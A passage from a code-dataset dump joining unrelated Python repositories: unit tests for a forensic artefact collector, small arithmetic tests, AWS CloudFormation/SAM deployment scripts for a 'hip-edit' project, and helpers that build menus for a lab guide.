with self.assertRaises(ApiKeyNotSetError):
tmp = collector.apikey
def test_apikey_getter(self):
"""
Should return the value of _apikey
:return:
"""
expected_apikey = "12345"
collector = TemperatureFromOpenWeatherDotCom(parent=None, parameters={})
collector._apikey = "12345"
actual_apikey = collector.apikey
self.assertEqual(expected_apikey, actual_apikey)
def test_apikey_setter_invalid_format(self):
"""
Should raise an error.
:return:
"""
from businesslogic.errors import ApiKeyFormatError
collector = TemperatureFromOpenWeatherDotCom(parent=None, parameters={})
with self.assertRaises(ApiKeyFormatError):
collector.apikey = '12345'
def test_apikey_setter(self):
"""
Should set the value of _apikey
:return:
"""
expected_key = '<KEY>'
collector = TemperatureFromOpenWeatherDotCom(parent=None, parameters={})
collector.apikey = expected_key
self.assertEqual(expected_key, collector._apikey)
```
#### File: mosk/tests/test_ewfimage.py
```python
import platform
import unittest
from unittest import TestCase
from unittest.mock import patch, MagicMock
class TestEWFImageDunderInit(TestCase):
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
@patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
def test___init__image_info(self):
"""
Should initialize member _imageInfo with EwfImageInfo object.
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
actual_ewf_image = EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
self.assertEqual(expected_image_info, actual_ewf_image._imageinfo)
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
def test___init__initialize_partition_lookup(self):
"""
Should call _initialize_partition_lookup
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
init_mock = MagicMock(return_value=None)
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
with patch('source.ewfimage.EWFImage._initialize_partition_lookup', init_mock):
EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
init_mock.assert_called_once()
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
@patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
def test___init__filesysteminfo(self):
"""
Should initialize member _filesysteminfo as empty dict.
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
expected_filesysteminfo: dict = {}
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
actual_ewf_image = EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
self.assertEqual(expected_filesysteminfo, actual_ewf_image._filesysteminfo)
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
@patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
def test___init__fs_discovered(self):
"""
Should initialize member _fs_discoverd with False
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
expected_fs_discovered: bool = False
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
actual_ewf_image = EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
self.assertEqual(expected_fs_discovered, actual_ewf_image._fs_discoverd)
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
@patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=True))
def test___init__discover_parameter_true(self):
"""
Should initialize member _fs_discoverd with True and call _initialize_partitions.
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
expected_fs_discovered: bool = True
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
init_mock = MagicMock(return_value=None)
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
with patch('source.ewfimage.EWFImage._initialize_partitions', init_mock):
actual_ewf_image = EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
self.assertEqual(expected_fs_discovered, actual_ewf_image._fs_discoverd)
init_mock.assert_called_once()
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
@patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
def test___init__discover_parameter_false(self):
"""
Should not call _initialize_partitions.
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
init_mock = MagicMock(return_value=None)
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
with patch('source.ewfimage.EWFImage._initialize_partitions', init_mock):
EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
init_mock.assert_not_called()
class TestEWFImage(TestCase):
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
@patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
def test_filesysteminfo_discover_not_set(self):
"""
Should raise an error
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
from businesslogic.errors import CollectorParameterError
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
ewf_image = EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
with self.assertRaises(CollectorParameterError):
ewf_image.filesysteminfo
class TestEWFPartitionFSObjectGetter(TestCase):
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
def test_fs_object(self):
"""Should raise LookupError if _fs_object is none"""
from source.ewfimage import EWFPartition
partition = EWFPartition(fs_object=None, partition={})
with self.assertRaises(LookupError):
partition.fs_object
```
#### File: mosk/tests/test_osinformation.py
```python
from unittest import TestCase, mock
from unittest.mock import MagicMock
from artefact.localhost.osinformation import OSName
class TestOSNameCollect(TestCase):
@mock.patch('artefact.localhost.osinformation.platform.system', MagicMock(return_value='Darwin'))
def test__collect(self):
"""
Should return the macOS platform name for a platform version, which is known.
:return:
"""
expected_platform_name = "Yosemite"
with mock.patch('artefact.localhost.osinformation.platform.mac_ver', MagicMock(return_value=['10.10'])):
collector = OSName(parent=None, parameters={})
collector._collect()
actual_platform_name = collector.data[0].collecteddata
self.assertEqual(expected_platform_name, actual_platform_name)
@mock.patch('artefact.localhost.osinformation.platform.system', MagicMock(return_value='Darwin'))
def test__collect_platform_is_bigsur(self):
"""
Should return always BigSur for all possible revisions of it.
:return:
"""
expected_platform_name = "BigSur"
with mock.patch('artefact.localhost.osinformation.platform.mac_ver', MagicMock(return_value=['11.2.3'])):
collector = OSName(parent=None, parameters={})
collector._collect()
actual_platform_name = collector.data[0].collecteddata
self.assertEqual(expected_platform_name, actual_platform_name)
@mock.patch('artefact.localhost.osinformation.platform.system', MagicMock(return_value='Darwin'))
def test__collect_platform_is_monterey(self):
"""
Should return always Monterey for all possible revisions of it.
:return:
"""
expected_platform_name = "Monterey"
with mock.patch('artefact.localhost.osinformation.platform.mac_ver', MagicMock(return_value=['12'])):
collector = OSName(parent=None, parameters={})
collector._collect()
actual_platform_name = collector.data[0].collecteddata
self.assertEqual(expected_platform_name, actual_platform_name)
@mock.patch('artefact.localhost.osinformation.platform.system', MagicMock(return_value='Darwin'))
def test__collect_unkwon_platform(self):
"""
Should collect a string saying, that the platform name cannot be collected.
:return:
"""
expected_platform_name = "Cannot collect OS name for platform version '13'"
with mock.patch('artefact.localhost.osinformation.platform.mac_ver', MagicMock(return_value=['13'])):
collector = OSName(parent=None, parameters={})
collector._collect()
actual_platform_name = collector.data[0].collecteddata
self.assertEqual(expected_platform_name, actual_platform_name)
@mock.patch('artefact.localhost.osinformation.platform.system', MagicMock(return_value='Darwin'))
def test__collection_version_string_unkown_format(self):
"""
Should raise an exception
:return:
"""
expected_platform_name = "Cannot collect OS name. Unexpected version string format '1.1.1'."
with mock.patch('artefact.localhost.osinformation.platform.mac_ver', MagicMock(return_value=['1.1.1'])):
collector = OSName(parent=None, parameters={})
collector._collect()
actual_platform_name = collector.data[0].collecteddata
self.assertEqual(expected_platform_name, actual_platform_name)
class TestOSNameSupportedSystem(TestCase):
def test__supportedsystem(self):
"""
Should be "Darwin"
:return:
"""
from artefact.localhost.osinformation import OSName
collector = OSName(parameters={}, parent={})
self.assertEqual("['Darwin']", str(collector.supported_platform))
class TestOSVersionSupportedSystem(TestCase):
def test__supportedsystem(self):
"""
Should be "Darwin".
:return:
"""
from artefact.localhost.osinformation import OSVersion
collector = OSVersion(parameters={}, parent={})
self.assertEqual("['Darwin']", str(collector.supported_platform))
``` |
{
"source": "3phase/ombudsman-website",
"score": 3
} |
#### File: ombudsman-website/story_generator/Node.py
```python
class Node:
def __init__(self, id, text):
self.id = id
self.text = text
self.nexts = []
self.edges = []
def setText(self, text):
self.text = text
def setId(self, id):
self.id
def getText(self):
return self.text
def getId(self):
return self.id
``` |
{
"source": "3pidemix/z09_homework1",
"score": 3
} |
#### File: z09_homework1/test/test_addition.py
```python
import unittest
from code.addition import add
from code.increment import inc
class TestAddition(unittest.TestCase):
def test_addition(self):
self.assertEqual(add(2, 4), 6)
def test_addition_neg(self):
self.assertNotEqual(add(82, -42), 16)
```
#### File: z09_homework1/test/test_multiplication.py
```python
import unittest
from code.multiplication import multiplication
class TestMultiplication(unittest.TestCase):
def test_multiplication(self):
self.assertEqual(multiplication(2, 4), 8)
def test_multiplication_neg(self):
self.assertNotEqual(multiplication(2, 5), 11)
``` |
{
"source": "3pillarlabs/hip-edit",
"score": 3
} |
#### File: hip-edit-infra/hip_edit/build_context.py
```python
import os
import yaml
class BuildContext(object):
"""
Collectible context for build and deployment steps.
"""
def __init__(self, file_path='.build_context.yml'):
self.file_path = file_path
self._build_data = None
self._lambda_vars = [
'npm_config_messaging_host',
'npm_config_messaging_password',
'npm_config_auth_agent_passcode'
]
def __str__(self):
return self.__repr__()
def __repr__(self):
return self._build_data.__repr__()
def lambda_vars(self):
"""
List of known variables.
"""
return self._lambda_vars
def get(self, name, group_key=None):
"""
Value if name is known, None otherwise.
"""
value = None
ctx = self._context()
if name == 'npm_config_messaging_host':
value = ctx['services']['MessageServerHost']
elif name == 'ApiUrl':
value = ctx['sam']['ApiUrl']
elif group_key is not None:
if isinstance(group_key, str):
value = ctx[group_key].get(name)
elif isinstance(group_key, (list, tuple)):
for k in group_key:
ctx = ctx[k]
value = ctx[name]
else:
value = ctx.get('sam', {}).get(name) or ctx.get('services', {}).get(name)
return value
def _context(self):
if self._build_data is None:
if os.path.exists(self.file_path):
self._build_data = yaml.load(file(self.file_path, 'r'))
else:
self._build_data = {}
return self._build_data
def add(self, group_key, outputs):
"""
Adds each output to the internal context, keyed by the group key
"""
ctx = self._context()
if isinstance(group_key, (list, tuple)):
for k in group_key:
if k not in ctx:
ctx[k] = {}
ctx = ctx[k]
else:
if group_key not in self._context():
ctx[group_key] = {}
ctx = ctx[group_key]
for output_dict in outputs:
if isinstance(output_dict, dict):
name = output_dict['OutputKey']
value = output_dict['OutputValue']
elif isinstance(output_dict, tuple):
name = output_dict[0]
value = output_dict[1]
ctx[name] = value
return self
def save(self):
"""
Saves the internal context to file
"""
yaml.dump(self._context(), stream=file(self.file_path, 'w'), default_flow_style=False)
return self
```
#### File: hip-edit-infra/hip_edit/cf_template_builder.py
```python
from troposphere import Template, Parameter
from hip_edit import log, resource_title
from hip_edit.resources import bucket
from hip_edit.resources import instance
from hip_edit.resources import vpc
LOGGER = log.get_stream_logger(__name__)
def build(cli_options, new_template=None):
"""
Constructs and returns the CF template.
"""
prefix = cli_options.name
template = new_template or Template(Description="Infrastructure for %s" % prefix)
_build_aws_cf_template(cli_options, template)
LOGGER.debug(template.to_yaml())
return template
def _build_aws_cf_template(cli_options, template):
"""
:param troposphere.Template template:
"""
prefix = cli_options.name
vpc_param = None
if cli_options.vpc_id:
vpc_param = Parameter(resource_title.vpc_title(prefix),
Type='AWS::EC2::VPC::Id',
Default=cli_options.vpc_id,
Description='VPC to use for the backing services')
template.add_parameter(vpc_param)
subnet_param = None
if cli_options.subnet_id:
subnet_param = Parameter(resource_title.subnet_title(prefix),
Type='AWS::EC2::Subnet::Id',
Default=cli_options.subnet_id,
Description='Subnet to use for the backing services')
template.add_parameter(subnet_param)
vpc_resource, subnet_resource, security_group_resource = vpc.build(prefix, template,
vpc_param=vpc_param,
subnet_param=subnet_param)
instance.build(prefix, template,
vpc=vpc_resource,
subnet=subnet_resource,
security_group=security_group_resource,
region_code=cli_options.region,
instance_type=cli_options.instance_type,
key_name=cli_options.key_name,
attach_eip=False if cli_options.stack_halt() else True
)
bucket.build(prefix, template, suffix=cli_options.domain_suffix)
# YAML format
# ---
# AWSTemplateFormatVersion: "version date"
#
# Description:
# String
#
# Metadata:
# template metadata
#
# Parameters:
# set of parameters
#
# Mappings:
# set of mappings
#
# Conditions:
# set of conditions
#
# Transform:
# set of transforms
#
# Resources:
# set of resources
#
# Outputs:
# set of outputs
#
```
#### File: hip-edit-infra/hip_edit/log.py
```python
import logging
def get_stream_logger(name, fmt=logging.BASIC_FORMAT):
"""
Builds a stream logger with root logging level.
"""
formatter = logging.Formatter(fmt)
console_handler = logging.StreamHandler()
console_handler.setFormatter(formatter)
logger = logging.getLogger(name)
logger.addHandler(console_handler)
return logger
```
#### File: hip_edit/resources/bucket.py
```python
from troposphere import GetAtt, Output
from troposphere.s3 import Bucket, PublicRead, WebsiteConfiguration
from hip_edit import resource_title
def build(prefix, template, suffix=None):
"""
Adds S3 and CloudFront elements to CF template.
"""
s3bucket = template.add_resource(Bucket(
"%sS3Bucket" % prefix,
AccessControl=PublicRead,
WebsiteConfiguration=WebsiteConfiguration(
IndexDocument="index.html"
),
BucketName=resource_title.bucket_name(prefix, suffix)
))
template.add_output([
Output(
"WebsiteURL",
Value=GetAtt(s3bucket, "WebsiteURL"),
Description="URL for website hosted on S3"
)
])
```
#### File: hip-edit-infra/hip_edit/resource_title.py
```python
import os
import re
VPC_GATEWAY_ATTACHMENT = "VPCGatewayAttachment"
def vpc_gateway_title(prefix):
"""
The VPC gateway title.
"""
return "%s%s" % (prefix, VPC_GATEWAY_ATTACHMENT)
def vpc_title(prefix):
"""
VPC title
"""
return "%sVPC" % prefix
def bucket_name(prefix, suffix=None):
"""
DNS compliant bucket name.
"""
if suffix:
fmt_str, fmt_args = ("%sApp.%s", (prefix, suffix))
else:
fmt_str, fmt_args = ("%sApp", prefix)
return "-".join([cp.lower() for cp in re.sub("([A-Z])", " \\1", fmt_str % fmt_args).split()])
def packaged_path(template_path, token='packaged'):
"""
Converts a path like ../foo/bar/template.yml to ../foo/bar/template-packaged.yml
"""
dn = os.path.dirname(template_path)
bn = os.path.basename(template_path)
fn, ext = re.split('\.', bn)
fp = os.path.join(dn, fn)
return "{0}-{1}.{2}".format(fp, token, ext)
def subnet_title(prefix, index=1):
"""Subnet title"""
return "%sPublicSubnet%d" % (prefix, index)
```
#### File: hip-edit/hip-edit-infra/sam.py
```python
from __future__ import print_function
import logging
from hip_edit import cli_arg_parser
from hip_edit import sam_deployer
from hip_edit.build_context import BuildContext
def main():
"""
Entry point.
"""
cli_options = cli_arg_parser.sam_arg_parser().parse_args()
logging.root.setLevel(logging.DEBUG if cli_options.verbose else logging.INFO)
build_context = BuildContext()
outputs = sam_deployer.main(cli_options, build_context)
if outputs is not None:
build_context.add('sam', outputs).save()
if __name__ == '__main__':
main()
```
#### File: hip-edit/hip-edit-infra/services.py
```python
from __future__ import print_function
import logging
from os import path
from hip_edit import activemq
from hip_edit import cli_arg_parser
from hip_edit import cf_template_builder
from hip_edit import cf_driver
from hip_edit import log
from hip_edit.build_context import BuildContext
LOGGER = log.get_stream_logger(__name__)
def main():
"""
Entry point
"""
cli_options = cli_arg_parser.services_arg_parser().parse_args()
logging.root.setLevel(logging.DEBUG if cli_options.verbose else logging.INFO)
if not cli_options.stack_down():
if cli_options.stack_halt():
if confirm("""You are going to stop the ActveMQ instance and release the EIP forever.
Is this what you want?""") != 'yes':
LOGGER.info('No changes made.')
return
template = cf_template_builder.build(cli_options)
else:
if confirm("""You are going to destroy all stack resources and
this operation can not be done. Is this what you want?""") != 'yes':
LOGGER.info('No changes made.')
return
template = None
outputs = cf_driver.execute(cli_options, template)
if outputs is None or cli_options.stack_down():
return
build_ctx = BuildContext()
build_ctx.add('services', outputs).save()
activemq_instance_id = build_ctx.get('MessageServerInstanceId', group_key='services')
if cli_options.stack_up():
activemq.check_instance_status(instance_id=activemq_instance_id)
hostname = build_ctx.get('npm_config_messaging_host')
outputs = activemq.configure(cli_options, hostname,
templates_path=path.abspath('./artifacts/activemq'),
distribution_type='bitnami')
build_ctx.add(('services', 'activemq', 'users'), outputs).save()
else:
activemq.halt_instance(instance_id=activemq_instance_id)
def confirm(message, prompt=' ([no]/yes) '):
"""Prints a message and returns user input."""
print("\n".join((s.strip() for s in message.split("\n"))), end='')
return raw_input(prompt)
if __name__ == '__main__':
main()
```
#### File: tests/hip_edit/build_context_test.py
```python
from os import path
import os
import tempfile
import unittest
import yaml
from hip_edit.build_context import BuildContext
class BuildContextTests(unittest.TestCase):
"""
Tests for build_context
"""
def setUp(self):
self.file_obj = path.join(tempfile.tempdir, '.build_context.yml')
self.build_context = BuildContext(file_path=self.file_obj)
def test_get(self):
"""
Tests getting values
"""
context = dict(
sam=dict(
ApiUrl='https://f1.execute-api.us-east-1.amazonaws.com/ga/',
LambdaArn='arn:aws:lambda:us-east-1:123:function:q-f-R0R'
),
services=dict(
InternetGateway='igw-123',
MessageServerHost='192.168.3.11',
PublicRouteTable='rtb-123'
)
)
yaml.dump(context, stream=file(self.file_obj, 'w'), default_flow_style=False)
assert self.build_context.get('ApiUrl') == context['sam']['ApiUrl']
assert self.build_context.get('npm_config_messaging_host') == context['services']['MessageServerHost']
def test_add_cf_outputs(self):
"""
Tests addition of cloud formation outputs
"""
message_server_host = dict(
OutputKey='MessageServerHost',
OutputValue='192.168.3.11')
self.build_context.add('services', [message_server_host])
assert self.build_context.get('npm_config_messaging_host') == message_server_host['OutputValue']
def test_add_tuple_outputs(self):
"""
Tests addition of key-value tuples
"""
users = dict(john='cr<PASSWORD>', alice='<PASSWORD>')
self.build_context.add('services', users.items())
assert self.build_context.get('john') == users['john']
assert self.build_context.get('alice') == users['alice']
def test_add_get_group_key(self):
"""
Tests addition of key-value tuples with hierarchial group_key
"""
users = dict(john='cr4=y', alice='bcf45')
groups = dict(publishers=['john', 'alice'])
self.build_context.add(('services', 'activemq', 'users'), users.items())
self.build_context.add('activemq-groups', groups.items())
assert self.build_context.get('john', group_key=('services', 'activemq', 'users')) == users['john']
assert self.build_context.get('alice', group_key=('services', 'activemq', 'users')) == users['alice']
assert self.build_context.get('publishers', group_key='activemq-groups') == groups['publishers']
```
#### File: tests/hip_edit/cf_driver_test.py
```python
from __future__ import print_function
from collections import namedtuple
import unittest
import botocore
from mock import MagicMock
from hip_edit import cf_template_builder
from hip_edit import cf_driver
FIELD_NAMES = ['name', 'region', 'instance_type', 'key_name', 'domain_suffix', 'vpc_id', 'subnet_id',
'stack_halt']
CliOptions = namedtuple('CliOptions', FIELD_NAMES)
def _make_cli_options(name='Plop',
region='eu-west-1',
instance_type='t2.micro',
key_name='plop',
domain_suffix=None,
vpc_id=None,
subnet_id=None,
stack_halt=MagicMock(return_value=False)):
return CliOptions(
name=name,
region=region,
instance_type=instance_type,
key_name=key_name,
domain_suffix=domain_suffix,
vpc_id=vpc_id,
subnet_id=subnet_id,
stack_halt=stack_halt
)
class CfDriverTests(unittest.TestCase):
"""
cf_driver.py tests
"""
def setUp(self):
self.cli_options = _make_cli_options()
self.template = cf_template_builder.build(self.cli_options)
def test_valid_cf_template(self):
"""Tests if the generated CF template is valid."""
assert self.template is not None
def test_creation_success(self):
"""CF stack creation in success path."""
ite = iter([None, -2, -1, 0])
initial_state = {
'Stacks': [{
'StackId': 'MockStack-1',
'StackStatus': 'CREATE_IN_PROGRESS'
}]
}
def _describe_stacks(*_args, **_kwargs):
val = ite.next()
if val is None:
raise botocore.exceptions.ClientError({}, 'mock')
elif val == -1:
initial_state['Stacks'][0]['Outputs'] = [{
'Key': 'yada', 'Value': 'yada'
}]
elif val == 0:
initial_state['Stacks'][0]['StackStatus'] = 'CREATE_COMPLETE'
return initial_state
client = MagicMock()
client.describe_stacks = MagicMock(side_effect=_describe_stacks)
client.create_stack = MagicMock(return_value={'StackId': 'MockStack-1'})
cf_driver.update_or_create_cf_template(__name__, self.template, client=client, retry_seconds=0)
def test_creation_failure_with_rollback_success(self):
"""CF stack creation in rollback path."""
states_ite = iter([None, 'CREATE_IN_PROGRESS', 'CREATE_FAILED', 'ROLLBACK_IN_PROGRESS', 'ROLLBACK_COMPLETE'])
initial_state = {
'Stacks': [{'StackStatus': 'CREATE_IN_PROGRESS'}]
}
def _describe_stacks(*_args, **_kwargs):
cur_state = states_ite.next()
if cur_state is None:
raise botocore.exceptions.ClientError({}, 'mock')
else:
initial_state['Stacks'][0]['StackStatus'] = cur_state
return initial_state
client = MagicMock()
client.describe_stacks = MagicMock(side_effect=_describe_stacks)
client.create_stack = MagicMock(return_value={'StackId': 'MockStack-1'})
cf_driver.update_or_create_cf_template(__name__, self.template, client=client, retry_seconds=0)
def test_update_success(self):
"""CF stack update in success path."""
states_ite = iter(['UPDATE_IN_PROGRESS', 'UPDATE_COMPLETE_CLEANUP_IN_PROGRESS', 'UPDATE_COMPLETE'])
initial_state = {
'Stacks': [{
'StackId': 'MockStack-1',
'StackStatus': None
}]
}
def _describe_stacks(*_args, **_kwargs):
initial_state['Stacks'][0]['StackStatus'] = states_ite.next()
return initial_state
client = MagicMock()
client.describe_stacks = MagicMock(side_effect=_describe_stacks)
client.update_stack = MagicMock(return_value={'StackId': 'MockStack-1'})
cf_driver.update_or_create_cf_template(__name__, self.template, client=client, retry_seconds=0)
def test_stack_halt(self):
"""Should not attach the EIP"""
self.cli_options = _make_cli_options(stack_halt=MagicMock(return_value=True))
template = cf_template_builder.build(self.cli_options)
assert 'MessageServerHost' not in template.to_dict()['Outputs']
``` |
{
"source": "3pings/HOLCLD-2100",
"score": 2
} |
#### File: HOLCLD-2100/core/lab_data.py
```python
import yaml, os
def get_lab_data():
yaml_path = os.path.abspath(os.path.join(os.path.dirname( __file__ ), os.pardir, 'lab/yaml/lab_data.yaml'))
yaml_data = open(yaml_path, 'r')
return yaml.load(yaml_data, Loader=yaml.FullLoader)
```
#### File: HOLCLD-2100/core/routefunc.py
```python
import collections
import yaml
import os
def base_section_files():
"""
Each member of the list is a section. Inside is a dictionary that contains the information for the chapters.
These three separate sections are split in the template to separate columns to fit the many sections on the
menu as needed.
You have two places for the URL indicator. The first is index of the dictionary and the second is the weburl.
These need to match. The dictionary is read from two separate places. One that just uses the dictionary
reference. The second that converts the dictionary to a list based on the POS column to keep the dictionary
in order as specified by the numeric value order.
"""
empty_menu = [
{
"head": {"line": "head", "step": 0, "pos": 1, "ls": True, "weburl": "head", "file": None, "title": "Introduction"},
"landing": {"line": "data", "step": 1, "pos": 2, "ls": True, "weburl": "landing", "file": "podlanding.html", "title": "Introduction"},
}
]
yaml_path = os.path.abspath(os.path.join(
os.path.dirname(__file__), os.pardir, 'lab/yaml/menu.yaml'))
if os.path.exists(yaml_path):
print("Menu YAML file exists. Processing")
yaml_data = open(yaml_path, 'r')
menu_dict = yaml.load(yaml_data, Loader=yaml.FullLoader)
else:
print("Menu !!NOT FOUND!!. Returning blank menu")
menu_dict = empty_menu
return menu_dict
def ordered_menu_list(data):
"""
:param data:
The purpose of this function is to take the menu dictionary and return a dictionary that is indexed by the
section and then that section would contain a list based on the sorted value of the POS column. If not the
MENU would end up with a different order as dictionaries in Python don't have order. This function is called
when the menu data is passed to the template that then processes it. Since we can't have the lambda function
inside of the template, we have to pass it ordered to the template.
"""
ordered_submenu_list = {}
for menu_section in data:
for key in menu_section.keys():
ordered_submenu_list[key] = []
for menu_section in data:
sorted_menus = sorted(
[v for v in next(iter(menu_section.values())).values()], key=lambda x: x['pos'])
topkey = menu_section.popitem()[0]
ordered_submenu_list[topkey] = sorted_menus
return ordered_submenu_list
def ordered_section_list(data):
"""
:param data:
This returns an ordered section list from the list dictionary of the menu.
"""
ordered_section_list = []
for menu_section in data:
for key in menu_section.keys():
ordered_section_list.append(key)
return ordered_section_list
def unordered_menu_dictionary():
data = base_section_files()
unordered_dictionary = {}
for menu_section in data:
for topkey, value in menu_section.items():
unordered_dictionary[topkey] = value
return unordered_dictionary
def create_lab_ui_steps(data, current_section):
"""
:param data:
:param current_section:
This function creates an HTML string around specific Cisco UI steps position to give the
user a sense of where they are located in the lab.
"""
html = "<div class='progress_step'>"
#html += "<div class='step_title'>LAB PROGRESS</div>"
html += "<div class='ui-steps step-list'>"
count = 1
list_of_sections = []
for section in data:
for key, dict in section.items():
list_of_sections.append(key)
current_list_position = list_of_sections.index(current_section)
for section in data:
for key, section_dict in section.items():
if section_dict["head"]["ls"]:
if key == current_section:
html += "<div class='ui-step active'>"
else:
position_in_list = list_of_sections.index(key)
if position_in_list < current_list_position:
html += "<div class='ui-step visited'>"
else:
html += "<div class='ui-step'>"
html += "<div class='step__icon'>" + str(count) + "</div>"
html += "<div class='step__label'>" + \
section_dict["head"]["title"] + "</div>"
html += "</div>"
count += 1
html += "</div></div>"
return html
def create_footer_urls():
"""
This function will read the YAML file called footer_links.yaml in the
lab section and create the HTML links at the bottom bar from that data.
"""
yaml_path = os.path.abspath(os.path.join(os.path.dirname(
__file__), os.pardir, 'lab/yaml/footer_links.yaml'))
if os.path.exists(yaml_path):
print("The footers yaml file exists, procesing")
yaml_data = open(yaml_path, 'r')
list_of_urls = yaml.load(yaml_data, Loader=yaml.FullLoader)
else:
list_of_urls = []
return list_of_urls
def ordered_page_list(data):
"""
this function takes the menu items and returns a list of them in sequential order based on the pos value. this
is used to then create the "next" and "previous" steps at the bottom of the page so the user goes back and
forth across the sections without the menu.
"""
mylist = []
newlist = {}
# the menu is a list of dictionaries in order. loop to extract the section dicts.
# note the title defined in lab/yaml/menu.yaml will be stripped to first 30 characters
for menudict in data:
for menukey, menudata in menudict.items():
for menuitem_key, menuitem_entry in menudata.items():
if menuitem_entry["line"] == "data":
newlist["exists"] = True
newlist["pos"] = menuitem_entry["pos"]
newlist["file"] = menuitem_entry["file"]
newlist["title"] = menuitem_entry["title"][:30]
newlist["weburl"] = menuitem_entry["weburl"]
newlist["section"] = menukey
mylist.append(newlist)
newlist = {}
ordered_list = sorted(mylist, key=lambda k: k['pos'])
return ordered_list
def get_page_position_data(page):
"""
:param page:
returns a list that contains the previous, current and next page position in the document
from the reference document structure list based on the current page.
"""
all_pages = ordered_page_list(base_section_files())
pageindex = page_find_numericindex(all_pages, page)
page_position_data = []
prev_page = page_index_info(pageindex - 1, all_pages)
current_page = page_index_info(pageindex, all_pages)
next_page = page_index_info(pageindex + 1, all_pages)
if prev_page["pos"] < current_page["pos"]:
page_position_data.append(prev_page)
else:
page_position_data.append({"exists": False})
page_position_data.append(current_page)
if next_page is not False:
if next_page["pos"] > current_page["pos"]:
page_position_data.append(next_page)
else:
page_position_data.append({"exists": False})
else:
page_position_data.append({"exists": False})
return page_position_data
def page_index_info(pageindex, all_pages):
try:
page_info = all_pages[pageindex]
except Exception:
return False
return page_info
def page_find_numericindex(all_pages, page):
for i, dic in enumerate(all_pages):
if dic['pos'] == page:
# print "this page is pos=" + str(dic['pos']) + " and index on the list of: " + str(i)
return i
return -1
def podlist():
yaml_path = os.path.abspath(os.path.join(os.path.dirname(
__file__), os.pardir, 'lab/yaml/pod_list.yaml'))
yaml_data = open(yaml_path, 'r')
return yaml.load(yaml_data, Loader=yaml.FullLoader)
def extract_parsed_commands(section, chapter):
import os
from bs4 import BeautifulSoup
from .routefunc import base_section_files
dict_menu = unordered_menu_dictionary()
path_to_file = os.path.abspath(os.path.join(
os.path.dirname(__file__), os.pardir, 'lab/templates/' + dict_menu[section][chapter]["file"]))
f = open(path_to_file)
contents = f.read()
htmlstring = "<pre>"
